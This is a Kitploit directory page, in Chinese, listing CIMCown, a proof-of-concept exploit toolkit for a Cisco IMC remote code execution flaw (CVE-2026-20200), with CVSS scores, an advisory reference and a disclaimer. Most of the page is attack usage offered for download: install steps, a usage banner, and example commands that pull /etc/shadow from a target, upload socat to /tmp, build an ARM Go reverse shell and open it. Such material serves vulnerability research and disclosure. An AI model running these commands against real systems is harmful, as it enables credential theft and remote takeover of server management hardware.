Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CIMCown — 用于利用 Cisco IMC RCE CVE-2026-20200 的 PoC 工具包 | Kitploit
工具/GitHubGitHub/nside-attack-logic/cimcown
漏洞分析漏洞利用Web应用程序漏洞利用远程访问工具Payload 开发
GitHubnside-attack-logic/cimcown

CIMCown

用于利用 Cisco IMC RCE CVE-2026-20200 的 PoC 工具包

查看仓库
19天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

CIMCown

CVE-2026-20200 Cisco IMC 中的参数注入与 RCE

Christoph Peil @ NSIDE ATTACK LOGIC 2026

CVE: CVE-2026-20200
CVSS v3.1 (CISCO): 8.8 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS v3.1 (NSIDE): 9.9 AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
公告: NSIDE-SA-2026-003
博客文章: https://www.nsideattacklogic.de/en/cisco-imc-when-remote-management-becomes-a-backdoor-cve-2026-20200/

此概念验证仅用于演示目的,禁止用于非法活动。 NSIDE ATTACK LOGIC 对因使用或滥用此代码造成的任何损害不承担责任。

此漏洞利用程序支持下载文件、上传文件以及生成反向 Shell。它包含多个 PoC 的 Python 文件、一个 shell 文件夹和一个 download 文件夹。

在 download 文件夹中存放着所有从服务器下载的文件,并以它们的名称命名(例如 /etc/passwd > passwd)。

shell 文件夹包含反向 Shell 所需的一切。文件 lib.so 是一个为 ARM 构建的小型库,用于在 IMC 上的 /tmp/main 中简单地执行该二进制文件。用于构建它的确切命令可在 util.py 中找到。此外,该文件夹中还有一个 reverse_shell.go.example,这是一个小型 Go 反向 Shell,需要事先编译,以包含你用于反向 Shell 的本地 IP。

要使反向 Shell 正常工作,你首先需要使用操作 -a build 进行构建。

安装:

root@kitploit:~
sudo apt install golang-go
pip install -r requirements.txt

用法

root@kitploit:~
Usage: CIMCown.py [-h] [--proxy PROXY] -t HOST -u USERNAME -p PASSWORD [-a ACTION] [-v]
options:
  -h, --help            show this help message and exit
  --proxy PROXY         Set proxy to use, e.g. 127.0.0.1:8080 (Default: NONE)
  -t, --host HOST       Target hostname or IP address (format 10.0.0.1 or 10.0.0.2:1337)
  -U, --username USERNAME
  -P, --password PASSWORD
  -a, --action ACTION   Action: test, download, upload, build, shell (default: test)
						Test will connect to the CIMC and download the file /etc/passwd
  -u, --uploadFile UPLOADFILE
                        File to upload
  -p, --remoteFile REMOTEFILE
                        Remote file path to upload to
  -d, --downloadFile DOWNLOADFILE
                        File to download, is saved into 'Download'
  -v, --verbose         Displays more information about cimc

示例

请注意用户名和密码使用大写 U 和大写 P!

测试工具并登录

root@kitploit:~
python ./CIMCown.py -U testAdmin -P testPassword -a test -t 192.168.10.2

下载文件 /etc/shadow

root@kitploit:~
python ./CIMCown.py -U testAdmin -P testPassword -a download -d '/etc/shadow' -t 192.168.10.2

将文件 ./shell/socat 上传到 /tmp/socat

root@kitploit:~
python ./CIMCown.py -U testAdmin -P testPassword -a upload -u './shell/socat' -p '/tmp/socat' -t 192.168.10.2

构建 Go 反向 Shell

root@kitploit:~
python ./CIMCown.py -U testAdmin -P testPassword -a build

获取反向 Shell

在 revShell 中使用本地 IP 前需要先执行操作 'build'
root@kitploit:~
# action 'build' is needed before for local IP in revShell
python ./CIMCown.py -U testAdmin -P testPassword -a shell
下载工具